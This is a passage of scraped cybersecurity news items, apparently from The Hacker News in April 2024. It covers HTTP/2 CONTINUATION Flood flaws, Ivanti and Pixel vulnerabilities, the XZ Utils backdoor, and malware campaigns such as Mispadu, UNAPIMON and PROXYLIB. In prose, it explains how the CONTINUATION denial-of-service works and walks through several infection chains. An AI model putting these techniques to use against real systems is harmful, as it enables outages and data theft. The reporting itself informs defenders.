Like in HTTP/1, HTTP/2 uses header fields within requests and responses. These header fields can comprise header lists, which in turn, are serialized and broken into header blocks. The header blocks are then divided into block fragments and transmitted within HEADER or what's called CONTINUATION frames.
"The CONTINUATION frame (type=0x9) is used to continue a sequence of header block fragments," the documentation for RFC 7540 reads.
"Any number of CONTINUATION frames can be sent, as long as the preceding frame is on the same stream and is a HEADERS, PUSH_PROMISE, or CONTINUATION frame without the END_HEADERS flag set."
The last frame containing headers will have the END_HEADERS flag set, which signals the remote endpoint that it's the end of the header block.
According to Nowotarski, CONTINUATION Flood is a class of vulnerabilities within several HTTP/2 protocol implementations that pose a more severe threat compared to the Rapid Reset attack that came to light in October 2023.
"A single machine (and in certain instances, a mere single TCP connection or a handful of frames) has the potential to disrupt server availability, with consequences ranging from server crashes to substantial performance degradation," the researcher said. "Remarkably, requests that constitute an attack are not visible in HTTP access logs."
The vulnerability, at its core, has to do with incorrect handling of HEADERS and multiple CONTINUATION frames that pave the way for a DoS condition.
In other words, an attacker can initiate a new HTTP/2 stream against a target server using a vulnerable implementation and send HEADERS and CONTINUATION frames with no set END_HEADERS flag, creating a never-ending stream of headers that the HTTP/2 server would need to parse and store in memory.
While the exact outcome varies depending on the implementation, impacts range from instant crash after sending a couple of HTTP/2 frames and out of memory crash to CPU exhaustion, thereby affecting server availability.
"RFC 9113 [...] mentions multiple security issues that may arise if CONTINUATION frames are not handled correctly," Nowotarski said.
"At the same time, it does not mention a specific case in which CONTINUATION frames are sent without the final END_HEADERS flag which can have repercussions on affected servers."
The issue impacts several projects such as amphp/http (CVE-2024-2653), Apache HTTP Server (CVE-2024-27316), Apache Tomcat (CVE-2024-24549), Apache Traffic Server (CVE-2024-31309), Envoy proxy (CVE-2024-27919 and CVE-2024-30255), Golang (CVE-2023-45288), h2 Rust crate, nghttp2 (CVE-2024-28182), Node.js (CVE-2024-27983), and Tempesta FW (CVE-2024-2758).
Users are recommended to upgrade affected software to the latest version to mitigate potential threats. In the absence of a fix, it's advised to consider temporarily disabling HTTP/2 on the server.
Ivanti Rushes Patches for 4 New Flaws in Connect Secure and Policy Secure
4.4.24
Vulnerebility
The Hacker News
Ivanti has released security
updates to address four security flaws impacting Connect Secure and Policy
Secure Gateways that could result in code execution and denial-of-service (DoS).
The list of flaws is as follows -
CVE-2024-21894 (CVSS score: 8.2) - A heap overflow vulnerability in the IPSec
component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure allows
an unauthenticated malicious user to send specially crafted requests in order to
crash the service thereby causing a DoS attack. In certain conditions, this may
lead to execution of arbitrary code.
CVE-2024-22052 (CVSS score: 7.5) - A
null pointer dereference vulnerability in IPSec component of Ivanti Connect
Secure (9.x, 22.x) and Ivanti Policy Secure allows an unauthenticated malicious
user to send specially crafted requests in order to crash the service thereby
causing a DoS attack.
CVE-2024-22053 (CVSS score: 8.2) - A heap overflow
vulnerability in the IPSec component of Ivanti Connect Secure (9.x, 22.x) and
Ivanti Policy Secure allows an unauthenticated malicious user to send specially
crafted requests in order to crash the service thereby causing a DoS attack or
in certain conditions read contents from memory.
CVE-2024-22023 (CVSS score:
5.3) - An XML entity expansion or XEE vulnerability in SAML component of Ivanti
Connect Secure (9.x, 22.x) and Ivanti Policy Secure allows an unauthenticated
attacker to send specially crafted XML requests in order to temporarily cause
resource exhaustion thereby resulting in a limited-time DoS.
The company,
which has been grappling with a steady stream of security flaws in its products
since the start of the year, said it's not aware of "any customers being
exploited by these vulnerabilities at the time of disclosure."
Late last month, Ivanti shipped patches for critical shortcoming in its Standalone Sentry product (CVE-2023-41724, CVSS score: 9.6) that could permit an unauthenticated threat actor to execute arbitrary commands on the underlying operating system.
It also resolved another critical flaw impacting on-premises versions of Neurons for ITSM (CVE-2023-46808, CVSS score: 9.9) that an authenticated remote attacker could abuse in order to perform arbitrary file writes and obtain code execution.
In an open letter published on April 3, 2023, Ivanti's CEO Jeff Abbott said the company is taking a "close look" at its own posture and processes to meet the requirements of the current threat landscape.
Abbott also said "events in recent months have been humbling" and that it's executing a plan that essentially changes its security operating model by adopting secure-by-design principles, sharing information with customers with complete transparency, and rearchitecting its engineering, security, and vulnerability management practices.
"We are intensifying our internal scanning, manual exploitation and testing capabilities, engaging trusted third parties to augment our internal research and facilitating responsible disclosure of vulnerabilities with increased incentives around an enhanced bug bounty program," Abbott said.
Google Warns: Android Zero-Day Flaws in Pixel Phones Exploited by Forensic
Companies
4.4.24
OS
The Hacker News
Google has disclosed that two
Android security flaws impacting its Pixel smartphones have been exploited in
the wild by forensic companies.
The high-severity zero-day vulnerabilities are as follows -
CVE-2024-29745 - An information disclosure flaw in the bootloader component
CVE-2024-29748 - A privilege escalation flaw in the firmware component
"There
are indications that the [vulnerabilities] may be under limited, targeted
exploitation," Google said in an advisory published April 2, 2024.
While the tech giant did not reveal any other information about the nature of the attacks exploiting these shortcomings, the maintainers of GrapheneOS said they "are being actively exploited in the wild by forensic companies."
"CVE-2024-29745 refers to a vulnerability in the fastboot firmware used to support unlocking/flashing/locking," they said in a series of posts on X (formerly Twitter).
"Forensic companies are rebooting devices in After First Unlock state into fastboot mode on Pixels and other devices to exploit vulnerabilities there and then dump memory."
GrapheneOS noted that CVE-2024-29748 could be weaponized by local attackers to interrupt a factory reset triggered via the device admin API.
The disclosure comes more than two months after the GrapheneOS team revealed that forensic companies are exploiting firmware vulnerabilities that impact Google Pixel and Samsung Galaxy phones to steal data and spy on users when the device is not at rest.
It also urged Google to introduce an auto-reboot feature to make exploitation of firmware flaws more difficult.
U.S. Cyber Safety Board Slams Microsoft Over Breach by China-Based Hackers
4.4.24
APT
The Hacker News
The U.S. Cyber Safety Review Board
(CSRB) has criticized Microsoft for a series of security lapses that led to the
breach of nearly two dozen companies across Europe and the U.S. by a China-based
nation-state group called Storm-0558 last year.
The findings, released by the Department of Homeland Security (DHS) on Tuesday, found that the intrusion was preventable, and that it became successful due to a "cascade of Microsoft's avoidable errors."
"It identified a series of Microsoft operational and strategic decisions that collectively pointed to a corporate culture that deprioritized enterprise security investments and rigorous risk management, at odds with the company's centrality in the technology ecosystem and the level of trust customers place in the company to protect their data and operations," the DHS said in a statement.
The CSRB also lambasted the tech titan for failing to detect the compromise on its own, instead relying on a customer to reach out to flag the breach. It further faulted Microsoft for not prioritizing the development of an automated key rotation solution and rearchitecting its legacy infrastructure to meet the needs of the current threat landscape.
The incident first came to light in July 2023 when Microsoft revealed that Storm-0558 gained unauthorized access to 22 organizations as well as more than more than 500 related individual consumer accounts.
Microsoft subsequently said a validation error in its source code made it possible for Azure Active Directory (Azure AD) tokens to be forged by Storm-0558 using a Microsoft account (MSA) consumer signing key, thus allowing the adversary to infiltrate the mailboxes.
In September 2023, the company divulged that Storm-0558 acquired the consumer signing key to forge the tokens by compromising an engineer's corporate account that had access to a debugging environment hosting a crash dump of its consumer signing system that also inadvertently contained the signing key.
Microsoft has since acknowledged in a March 2024 update that it was inaccurate and that it has not still been able to locate a "crash dump containing the impacted key material." It also said its investigation into the hack remains ongoing.
"Our leading hypothesis remains that operational errors resulted in key material leaving the secure token signing environment that was subsequently accessed in a debugging environment via a compromised engineering account," it noted.
"Recent events have demonstrated a need to adopt a new culture of engineering
security in our own networks," a Microsoft spokesperson was quoted as saying to
The Washington Post.
As many as 60,000 unclassified emails from Outlook accounts are believed to have been exfiltrated over the course of the campaign that began in May 2023. China has rejected accusations that it was behind the attack.
Earlier this February, Redmond expanded free logging capabilities to all U.S. federal agencies using Microsoft Purview Audit, irrespective of the license tier, to help them detect, respond, and prevent sophisticated cyber attacks.
"The threat actor responsible for this brazen intrusion has been tracked by industry for over two decades and has been linked to 2009 Operation Aurora and 2011 RSA SecureID compromises," said CSRB Acting Deputy Chair Dmitri Alperovitch.
"This People's Republic of China affiliated group of hackers has the capability and intent to compromise identity systems to access sensitive data, including emails of individuals of interest to the Chinese government."
To safeguard against threats from state-sponsored actors, cloud service providers have been recommended to -
Implement modern control mechanisms and baseline practices
Adopt a minimum
standard for default audit logging in cloud services
Incorporate emerging
digital identity standards to secure cloud services
Adopt incident and
vulnerability disclosure practices to maximize transparency
Develop more
effective victim notification and support mechanisms to drive
information-sharing efforts
"The United States government should update the
Federal Risk Authorization Management Program and supporting frameworks and
establish a process for conducting discretionary special reviews of the
program's authorized Cloud Service Offerings following especially high-impact
situations," the CSRB said.
Google Chrome Beta Tests New DBSC Protection Against Cookie-Stealing Attacks
3.4.24
Safety
The Hacker News
Google on Tuesday said it's
piloting a new feature in Chrome called Device Bound Session Credentials (DBSC)
to help protect users against session cookie theft by malware.
The prototype – currently tested against "some" Google Account users running Chrome Beta – is built with an aim to make it an open web standard, the tech giant's Chromium team said.
"By binding authentication sessions to the device, DBSC aims to disrupt the cookie theft industry since exfiltrating these cookies will no longer have any value," the company noted.
"We think this will substantially reduce the success rate of cookie theft malware. Attackers would be forced to act locally on the device, which makes on-device detection and cleanup more effective, both for anti-virus software as well as for enterprise managed devices."
The development comes on the back of reports that off-the-shelf information stealing malware are finding ways to steal cookies in a manner that allows threat actors to bypass multi-factor authentication (MFA) protection and gain unauthorized access to online accounts.
Such session hijacking techniques are not new. In October 2021, Google's Threat Analysis Group (TAG) detailed a phishing campaign that targeted YouTube content creators with cookie stealing malware to hijack their accounts and monetize the access for perpetrating cryptocurrency scams.
Earlier this January, CloudSEK revealed that information stealers like Lumma, Rhadamanthys, Stealc, Meduza, RisePro, and WhiteSnake have updated their capabilities to hijack user sessions and allow continuous access to Google services even after a password reset.
Google told The Hacker News at the time that "attacks involving malware that steal cookies and tokens are not new; we routinely upgrade our defenses against such techniques and to secure users who fall victim to malware."
It further recommended users to enable Enhanced Safe Browsing in the Chrome web browser to protect against phishing and malware downloads.
DBSC aims to cut down on such malicious efforts by introducing a cryptographic approach that ties together the sessions to the device such that it makes it harder for the adversaries to abuse the stolen cookies and hijack the accounts.
Offered via an API, the new feature achieves this by allowing a server to
associate a session with a public key created by the browser as part of a
public/private key pair when a new session is launched.
It's worth noting that the key pair is stored locally on the device using Trusted Platform Modules (TPMs). In addition, the DBSCI API permits the server to verify proof-of-possession of the private key throughout the session lifetime to ensure the session is active on the same device.
"DBSC offers an API for websites to control the lifetime of such keys, behind the abstraction of a session, and a protocol for periodically and automatically proving possession of those keys to the website's servers," Google's Kristian Monsen and Arnar Birgisson said.
"There is a separate key for each session, and it should not be possible to detect that two different session keys are from one device. By device-binding the private key and with appropriate intervals of the proofs, the browser can limit malware's ability to offload its abuse off of the user's device, significantly increasing the chance that either the browser or server can detect and mitigate cookie theft."
One crucial caveat is that DBSC banks on user devices having a secure way of signing challenges while protecting private keys from exfiltration by malware, necessitating that the web browser has access to the TPM.
Google said support for DBSC will be initially rolled out to roughly half of Chrome's desktop users based on the hardware capabilities of their machines. The latest project is also expected to be in sync with the company's broader plans to sunset third-party cookies in the browser by the end of the year via the Privacy Sandbox initiative.
"This is to make sure that DBSC does not become a new tracking vector once third-party cookies are phased out, while also ensuring that such cookies can be fully protected in the meantime," it said. "If the user completely opts out of cookies, third-party cookies, or cookies for a specific site, this will disable DBSC in those scenarios as well."
The company further noted that it's engaging with several server providers, identity providers (IdPs), and browser vendors like Microsoft Edge and Okta, who have expressed interest in DBSC. Origin trials for DBSC for all supported websites are set to commence by the end of the year.
Mispadu Trojan Targets Europe, Thousands of Credentials Compromised
3.4.24
Virus
The Hacker News
The banking trojan known as Mispadu has expanded its focus beyond Latin America (LATAM) and Spanish-speaking individuals to target users in Italy, Poland, and Sweden.
Targets of the ongoing campaign include entities spanning finance, services, motor vehicle manufacturing, law firms, and commercial facilities, according to Morphisec.
"Despite the geographic expansion, Mexico remains the primary target," security researcher Arnold Osipov said in a report published last week.
"The campaign has resulted in thousands of stolen credentials, with records dating back to April 2023. The threat actor leverages these credentials to orchestrate malicious phishing emails, posing a significant threat to recipients."
Mispadu, also called URSA, came to light in 2019, when it was observed carrying out credential theft activities aimed at financial institutions in Brazil and Mexico by displaying fake pop-up windows. The Delphi-based malware is also capable of taking screenshots and capturing keystrokes.
Typically distributed via spam emails, recent attack chains have leveraged a now-patched Windows SmartScreen security bypass flaw (CVE-2023-36025, CVSS score: 8.8) to compromise users in Mexico.
The infection sequence analyzed by Morphisec is a multi-stage process that commences with a PDF attachment present in invoice-themed emails that, when opened, prompts the recipient to click on a booby-trapped link to download the complete invoice, resulting in the download of a ZIP archive.
The ZIP comes with either an MSI installer or an HTA script that's responsible for retrieving and executing a Visual Basic Script (VBScript) from a remote server, which, in turn, downloads a second VBScript that ultimately downloads and launches the Mispadu payload using an AutoIT script but after it's decrypted and injected into memory by means of a loader.
"This [second] script is heavily obfuscated and employs the same decryption algorithm as mentioned in the DLL," Osipov said.
"Before downloading and invoking the next stage, the script conducts several Anti-VM checks, including querying the computer's model, manufacturer, and BIOS version, and comparing them to those associated with virtual machines."
The Mispadu attacks are also characterized by the use of two distinct command-and-control (C2) servers, one for fetching the intermediate and final-stage payloads and another for exfiltrating the stolen credentials from over 200 services. There are currently more than 60,000 files in the server.
The development comes as the DFIR Report detailed a February 2023 intrusion that entailed the abuse of malicious Microsoft OneNote files to drop IcedID, using it to drop Cobalt Strike, AnyDesk, and the Nokoyawa ransomware.
Microsoft, exactly a year ago, announced that it would start blocking 120 extensions embedded within OneNote files to prevent its abuse for malware delivery.
YouTube Videos for Game Cracks Serve Malware#
The findings also come as
enterprise security firm Proofpoint said several YouTube channels promoting
cracked and pirated video games are acting as a conduit to deliver information
stealers such as Lumma Stealer, Stealc, and Vidar by adding malicious links to
video descriptions.
"The videos purport to show an end user how to do things like download software or upgrade video games for free, but the link in the video descriptions leads to malware," security researcher Isaac Shaughnessy said in an analysis published today.
There is evidence to suggest that such videos are posted from compromised accounts, but there is also the possibility that the threat actors behind the operation have created short-lived accounts for dissemination purposes.
All the videos include Discord and MediaFire URLs that point to password-protected archives that ultimately lead to the deployment of the stealer malware.
Proofpoint said it identified multiple distinct activity clusters propagating stealers via YouTube with an aim to single out non-enterprise users. The campaign has not been attributed to a single threat actor or group.
"The techniques used are similar, however, including the use of video descriptions to host URLs leading to malicious payloads and providing instructions on disabling antivirus, and using similar file sizes with bloating to attempt to bypass detections," Shaughnessy said.
Critical Security Flaw Found in Popular LayerSlider WordPress Plugin
3.4.24
Vulnerebility
The Hacker News
A critical security flaw impacting
the LayerSlider plugin for WordPress could be abused to extract sensitive
information from databases, such as password hashes.
The flaw, designated as CVE-2024-2879, carries a CVSS score of 9.8 out of a maximum of 10.0. It has been described as a case of SQL injection impacting versions from 7.9.11 through 7.10.0.
The issue has been addressed in version 7.10.1 released on March 27, 2024, following responsible disclosure on March 25. "This update includes important security fixes," the maintainers of LayerSlider said in their release notes.
LayerSlider is a visual web content editor, a graphic design software, and a digital visual effects that allows users to create animations and rich content for their websites. According to its own site, the plugin is used by "millions of users worldwide."
The flaw discovered in the tool stems from a case of insufficient escaping of user supplied parameters and the absence of wpdb::prepare(), enabling unauthenticated attackers to append additional SQL queries and glean sensitive information, Wordfence said.
The development follows the discovery of an unauthenticated stored cross-site scripting (XSS) flaw in the WP-Members Membership Plugin (CVE-2024-1852, CVSS score: 7.2) that could facilitate the execution of arbitrary JavaScript code. It has been resolved in version 3.4.9.3.
The vulnerability, due to insufficient input sanitization and output escaping,
"makes it possible for unauthenticated attackers to inject arbitrary web scripts
in pages that will execute whenever a user accesses an injected page which is
the edit users page," the WordPress security company said.
Should the code be executed in the context of an administrator's browser session, it can be used to create rogue user accounts, redirect site visitors to other malicious sites, and carry out other attacks, it added.
Over the past few weeks, security vulnerabilities have also been disclosed in other WordPress plugins such as Tutor LMS (CVE-2024-1751, CVSS score: 8.8) and Contact Form Entries (CVE-2024-2030, CVSS score: 6.4) that could be exploited for information disclosure and injecting arbitrary web scripts, respectively.
Malicious Code in XZ Utils for Linux Systems Enables Remote Code Execution
2.4.24
Virus
The Hacker News
The malicious code inserted into
the open-source library XZ Utils, a widely used package present in major Linux
distributions, is also capable of facilitating remote code execution, a new
analysis has revealed.
The audacious supply chain compromise, tracked as CVE-2024-3094 (CVSS score: 10.0), came to light last week when Microsoft engineer and PostgreSQL developer Andres Freund alerted to the presence of a backdoor in the data compression utility that gives remote attackers a way to sidestep secure shell authentication and gain complete access to an affected system.
XZ Utils is a command-line tool for compressing and decompressing data in Linux and other Unix-like operating systems.
The malicious code is said to have been deliberately introduced by one of the project maintainers named Jia Tan (aka Jia Cheong Tan or JiaT75) in what appears to be a meticulous attack spanning multiple years. The GitHub user account was created in 2021. The identity of the actor(s) is presently unknown.
"The threat actor started contributing to the XZ project almost two years ago, slowly building credibility until they were given maintainer responsibilities," Akamai said in a report.
In a further act of clever social engineering, sockpuppet accounts like Jigar Kumar and Dennis Ens are believed to have been used to send feature requests and report a variety of issues in the software in order to force the original maintainer – Lasse Collin of the Tukaani Project – to add a new co-maintainer to the repository.
Enter Jia Tan, who introduced a series of changes to XZ Utils in 2023, which eventually made their way to release version 5.6.0 in February 2024. They also harbored a sophisticated backdoor.
Source: Thomas Roccia
"As I have hinted in earlier emails, Jia Tan may have a
bigger role in the project in the future," Collin said in an exchange with Kumar
in June 2022.
"He has been helping a lot off-list and is practically a co-maintainer already. :-) I know that not much has happened in the git repository yet but things happen in small steps. In any case some change in maintainership is already in progress at least for XZ Utils."
The backdoor affects XZ Utils 5.6.0 and 5.6.1 release tarballs, the latter of which contains an improved version of the same implant. Collins has since acknowledged the project's breach, stating both the tarballs were created and signed by Jia Tan and that they had access only to the now-disabled GitHub repository.
"This is clearly a very complex state-sponsored operation with impressive sophistication and multi-year planning," firmware security company Binarly said. "Such a complex and professionally designed comprehensive implantation framework is not developed for a one-shot operation."
A deeper examination of the backdoor by open-source cryptographer Filippo
Valsorda has also revealed that the affected versions allow specific remote
attackers to send arbitrary payloads through an SSH certificate which will be
executed in a manner that circumvents authentication protocols, effectively
seizing control over the victim machine.
"It appears as though the backdoor is added to the SSH daemon on the vulnerable machine, enabling a remote attacker to execute arbitrary code," Akamai said. "This means that any machine with the vulnerable package that exposes SSH to the internet is potentially vulnerable."
Needless to say, the accidental discovery by Freund is one of the most significant supply chain attacks discovered to date and could have been a severe security disaster had the package been integrated into stable releases of Linux distributions.
"The most notable part of this supply chain attack is the extreme levels of dedication of the attacker, working more than two years to establish themselves as a legitimate maintainer, offering to pick up work in various OSS projects and committing code across multiple projects in order to avoid detection," JFrog said.
As with the case of Apache Log4j, the incident once again highlights the reliance on open-source software and volunteer-run projects, and the consequences that could entail should they suffer a compromise or have a major vulnerability.
"The bigger 'fix' is for organizations to adopt tools and processes that allow them to identify signs of tampering and malicious features within both open source and commercial code used in their own development pipeline," ReversingLabs said.
China-linked Hackers Deploy New 'UNAPIMON' Malware for Stealthy Operations
2.4.24
APT
The Hacker News
A threat activity cluster tracked
as Earth Freybug has been observed using a new malware called UNAPIMON to fly
under the radar.
"Earth Freybug is a cyberthreat group that has been active since at least 2012 that focuses on espionage and financially motivated activities," Trend Micro security researcher Christopher So said in a report published today.
"It has been observed to target organizations from various sectors across different countries."
The cybersecurity firm has described Earth Freybug as a subset within APT41, a China-linked cyber espionage group that's also tracked as Axiom, Brass Typhoon (formerly Barium), Bronze Atlas, HOODOO, Wicked Panda, and Winnti.
The adversarial collective is known to rely on a combination of living-off-the-land binaries (LOLBins) and custom malware to realize its goals. Also adopted are techniques like dynamic-link library (DLL) hijacking and application programming interface (API) unhooking.
Trend Micro said the activity shares tactical overlaps with a cluster previously disclosed by cybersecurity company Cybereason under the name Operation CuckooBees, which refers to an intellectual property theft campaign targeting technology and manufacturing companies located in East Asia, Western Europe, and North America.
The starting point of the attack chain is the use of a legitimate executable associated with VMware Tools ("vmtoolsd.exe") to create a scheduled task using "schtasks.exe" and deploy a file named "cc.bat" in the remote machine.
It's currently not known how the malicious code came to be injected in vmtoolsd.exe, although it's suspected that it may have involved the exploitation of external-facing servers.
The batch script is designed to amass system information and launch a second scheduled task on the infected host, which, in turn, executes another batch file with the same name ("cc.bat") to ultimately run the UNAPIMON malware.
"The second cc.bat is notable for leveraging a service that loads a non-existent library to side-load a malicious DLL," So explained. "In this case, the service is SessionEnv."
This paves the way for the execution of TSMSISrv.DLL that's responsible for dropping another DLL file (i.e., UNAPIMON) and injecting that same DLL into cmd.exe. Simultaneously, the DLL file is also injected into SessionEnv for defense evasion.
On top of that, the Windows command interpreter is designed to execute commands coming from another machine, essentially turning it into a backdoor.
A simple C++-based malware, UNAPIMON is equipped to prevent child processes from being monitored by leveraging an open-source Microsoft library called Detours to unhook critical API functions, thereby evading detection in sandbox environments that implement API monitoring through hooking.
The cybersecurity company characterized the malware as original, calling out the author's "coding prowess and creativity" as well as their use of an off-the-shelf library to carry out malicious actions.
"Earth Freybug has been around for quite some time, and their methods have been seen to evolve through time," Trend Micro said.
"This attack also demonstrates that even simple techniques can be used effectively when applied correctly. Implementing these techniques to an existing attack pattern makes the attack more difficult to discover."
Google to Delete Billions of Browsing Records in 'Incognito Mode' Privacy
Lawsuit Settlement
2.4.24
Security
The Hacker News
Google has agreed to purge billions of data records reflecting users' browsing activities to settle a class action lawsuit that claimed the search giant tracked them without their knowledge or consent in its Chrome browser.
The class action, filed in 2020, alleged the company misled users by tracking their internet browsing activity who thought that it remained private when using the "incognito" or "private" mode on web browsers like Chrome.
In late December 2023, it emerged that the company had consented to settle the lawsuit. The deal is currently pending approval by the U.S. District Judge Yvonne Gonzalez Rogers.
"The settlement provides broad relief regardless of any challenges presented by Google's limited record keeping," a court filing on April 1, 2024, said.
"Much of the private browsing data in these logs will be deleted in their entirety, including billions of event level data records that reflect class members' private browsing activities."
As part of the data remediation process, Google is also required to delete information that makes private browsing data identifiable by redacting data points like IP addresses, generalizing User-Agent strings, and remove detailed URLs within a specific website (i.e., retain only domain-level portion of the URL).
In addition, it has been asked to delete the so-called X-Client-Data header field, which Google described as a Chrome-Variations header that captures the "state of the installation of Chrome itself, including active variations, as well as server-side experiments that may affect the installation."
This header is generated from a randomized seed value, making it potentially unique enough to identify specific Chrome users.
Other settlement terms require Google to block third-party cookies within Chrome's Incognito Mode for five years, a setting the company has already implemented for all users. The tech company has separately announced plans to eliminate tracking cookies by default by the end of the year.
Google has since also updated the wording of Incognito Mode as of January 2024 to clarify that the setting will not change "how data is collected by websites you visit and the services they use, including Google."
The lawsuit extracted admissions from Google employees that characterized the browser's Incognito browsing mode as a "confusing mess," "effectively a lie," and a "problem of professional ethics and basic honesty."
It further laid bare internal exchanges in which executives argued Incognito Mode shouldn't be called "private" because it risked "exacerbating known misconceptions."
The development comes as Google said it has started automatically blocking bulk senders in Gmail that don't meet its Email sender guidelines in an attempt to cut down on spam and phishing attacks.
The new requirements make it mandatory for email senders who push out more than 5,000 messages per day to Gmail accounts to provide a one-click unsubscribe option and respond to unsubscription requests within two days.
Massive Phishing Campaign Strikes Latin America: Venom RAT Targeting Multiple
Sectors
2.4.24
Virus
The Hacker News
The threat actor known as TA558 has been attributed to a new massive phishing campaign that targets a wide range of sectors in Latin America with the goal of deploying Venom RAT.
The attacks primarily singled out hotel, travel, trading, financial, manufacturing, industrial, and government verticals in Spain, Mexico, United States, Colombia, Portugal, Brazil, Dominican Republic, and Argentina.
Active since at least 2018, TA558 has a history of targeting entities in the LATAM region to deliver a variety of malware such as Loda RAT, Vjw0rm, and Revenge RAT.
The latest infection chain, according to Perception Point researcher Idan Tarab, leverages phishing emails as an initial access vector to drop Venom RAT, a fork of Quasar RAT that comes with capabilities to harvest sensitive data and commandeer systems remotely.
The disclosure comes as threat actors have been increasingly observed using the DarkGate malware loader following the law enforcement takedown of QakBot last year to target financial institutions in Europe and the U.S.
"Ransomware groups utilize DarkGate to create an initial foothold and to deploy various types of malware in corporate networks," EclecticIQ researcher Arda Büyükkaya noted.
"These include, but are not limited to, info-stealers, ransomware, and remote management tools. The objective of these threat actors is to increase the number of infected devices and the volume of data exfiltrated from a victim."
It also follows the emergence of malvertising campaigns designed to deliver
malware like FakeUpdates (aka SocGholish), Nitrogen, and Rhadamanthys.
Earlier this month, Israeli ad security company GeoEdge revealed that a notorious malvertising group tracked as ScamClub "has shifted its focus towards video malvertising assaults, resulting in a surge in VAST-forced redirect volumes since February 11, 2024."
The attacks entail the malicious use of Video Ad Serving Templates (VAST) tags – which are used for video advertising – to redirect unsuspecting users to fraudulent or scam pages but only upon successful passage of certain client-side and server-side fingerprinting techniques.
A majority of the victims are located in the U.S. (60.5%), followed by Canada (7.2%), the U.K. (4.8%), Germany (2.1%), and Malaysia (1.7%), among others.
Indian Government Rescues 250 Citizens Forced into Cybercrime in Cambodia
1.4.24
BigBrothers
The Hacker News
The Indian government said it has
rescued and repatriated about 250 citizens in Cambodia who were held captive and
coerced into running cyber scams.
The Indian nationals "were lured with employment opportunities to that country but were forced to undertake illegal cyber work," the Ministry of External Affairs (MEA) said in a statement, adding it had rescued 75 people in the past three months.
It also said it's working with "with Cambodian authorities and with agencies in India to crack down on those responsible for these fraudulent schemes."
The development comes in the wake of a report from the Indian Express that said more than 5,000 Indians stuck in Cambodia were forced into "cyber slavery" by organized crime rackets to scam people in India and extort money by masquerading as law enforcement authorities in some cases.
The report also tracks with an earlier disclosure from INTERPOL, which characterized the situation as human trafficking-fuelled fraud on an industrial scale.
This included an accountant from the state of Telangana, who was "lured to Southeast Asia where he was forced to participate in online fraud schemes in inhuman conditions." He was subsequently let go after paying a ransom.
In another instance highlighted by the Indian Express, one of the rescued men was recruited by an agent from the south Indian city of Mangaluru for a data entry job, only to be asked to create fake social media accounts with photographs of women and use them to contact people.
"We had targets and if we didn't meet those, they would not give us food or allow us into our rooms," the individual, identified only as Stephen, was quoted as saying.
China and the Philippines have undertaken similar efforts to free hundreds of Filipinos, Chinese, and other foreign nationals who were entrapped and forced into criminal activity, running what's called pig butchering scams.
These schemes typically start with the scammer adopting a bogus identity to lure prospective victims into investing in non-existing crypto businesses that are designed to steal their funds. The fraudsters are known to gain their target's trust under the illusion of a romantic relationship.
In a report published in February 2024, Chainalysis said the cryptocurrency wallets associated with one of the pig butchering gangs operating out of Myanmar has recorded close to $100 million in crypto inflows, some of which is also estimated to include the ransom payments made by the families of trafficked workers.
"The brutal conditions trafficking victims face on the compounds also lend additional urgency to solving the problem of romance scamming — not only are consumers being bilked out of hundreds of millions of dollars each year, but the gangs behind those scams are also perpetuating a humanitarian crisis," the blockchain analytics firm said.
News of the rescue efforts also follow research from Check Point that threat actors are exploiting a function in Ethereum called CREATE2 to bypass security measures and gain unauthorized access to funds. Details of the scam were previously disclosed by Scam Sniffer in November 2023.
The crux of the technique is the use of CREATE2 to generate a new "temporary" wallet address that has no history of being reported for criminal activity, thus allowing threat actors to make the illicit transactions to the address once the victim approves the contract and circumvent protections that flag such addresses.
"The attack method involves tricking users into approving transactions for smart contracts that haven't been deployed yet, allowing cyber criminals to later deploy malicious contracts and steal cryptocurrencies," the Israeli company said.
Malicious Apps Caught Secretly Turning Android Phones into Proxies for
Cybercriminals
1.4.24
OS
The Hacker News
Several malicious Android apps that turn mobile devices running the operating system into residential proxies (RESIPs) for other threat actors have been observed on the Google Play Store.
The findings come from HUMAN's Satori Threat Intelligence team, which said the cluster of VPN apps came fitted with a Golang library that transformed the user's device into a proxy node without their knowledge.
The operation has been codenamed PROXYLIB by the company. The 29 apps in question have since been removed by Google.
Residential proxies are a network of proxy servers sourced from real IP addresses provided by internet service providers (ISPs), helping users hide their actual IP addresses by routing their internet traffic through an intermediary server.
The anonymity benefits aside, they are ripe for abuse by threat actors to not only obfuscate their origins, but also to conduct a wide range of attacks.
"When a threat actor uses a residential proxy, the traffic from these attacks appears to be coming from different residential IP addresses instead of an IP of a data center or other parts of a threat actor's infrastructure," security researchers said. "Many threat actors purchase access to these networks to facilitate their operations."
Some of these networks can be created by malware operators tricking unsuspecting users into installing bogus apps that essentially corral the devices into a botnet that's then monetized for profit by selling the access to other customers.
The Android VPN apps discovered by HUMAN are designed to establish contact with a remote server, enroll the infected device to the network, and process any request from the proxy network.
Another notable aspect of these apps is that a subset of them identified between May and October 2023 incorporate a software development kit (SDK) from LumiApps, which contains the proxyware functionality. In both cases, the malicious capability is pulled off using a native Golang library.
LumiApps also offers a service that essentially permits users to upload any APK
file of their choice, including legitimate applications, and bundle the SDK to
it without having to create a user account, which can then be re-downloaded and
shared with others.
"LumiApps helps companies gather information that is publicly available on the internet," the Israeli company says on its website. "It uses the user's IP address to load several web pages in the background from well-known websites."
"This is done in a way that never interrupts the user and fully complies with GDPR/CCPA. The web pages are then sent to companies, who use them to improve their databases, offering better products, services, and pricing."
These modified apps – called mods – are then distributed in and out of the Google Play Store. LumiApps promotes itself and the SDK as an alternative app monetization method to rendering ads.
There is evidence indicating that the threat actor behind PROXYLIB is selling access to the proxy network created by the infected devices through LumiApps and Asocks, a company that advertises itself as a seller of residential proxies.
What's more, in an effort to bake the SDK into as many apps as possible and expand the size of the botnet, LumiApps offers cash rewards to developers based on the amount of traffic that gets routed through user devices that have installed their apps. The SDK service is also advertised on social media and black hat forums.
Recent research published by Orange Cyberdefense and Sekoia characterized residential proxies as part of a "fragmented yet interconnected ecosystem," in which proxyware services are advertised in various ways ranging from voluntary contributions to dedicated shops and reselling channels.
"[In the case of SDKs], the proxyware is often embedded in a product or
service," the companies noted. Users may not notice that proxyware will be
installed when accepting the terms of use of the main application it is embedded
with. This lack of transparency leads to users sharing their Internet connection
without a clear understanding."
The development comes as the Lumen Black Lotus Labs disclosed that end-of-life (EoL) small home/small office (SOHO) routers and IoT devices are being compromised by a botnet known as TheMoon to power a criminal proxy service called Faceless.
Vultur Android Banking Trojan Returns with Upgraded Remote Control Capabilities
1.4.24
OS
The Hacker News
The Android banking trojan known as
Vultur has resurfaced with a suite of new features and improved anti-analysis
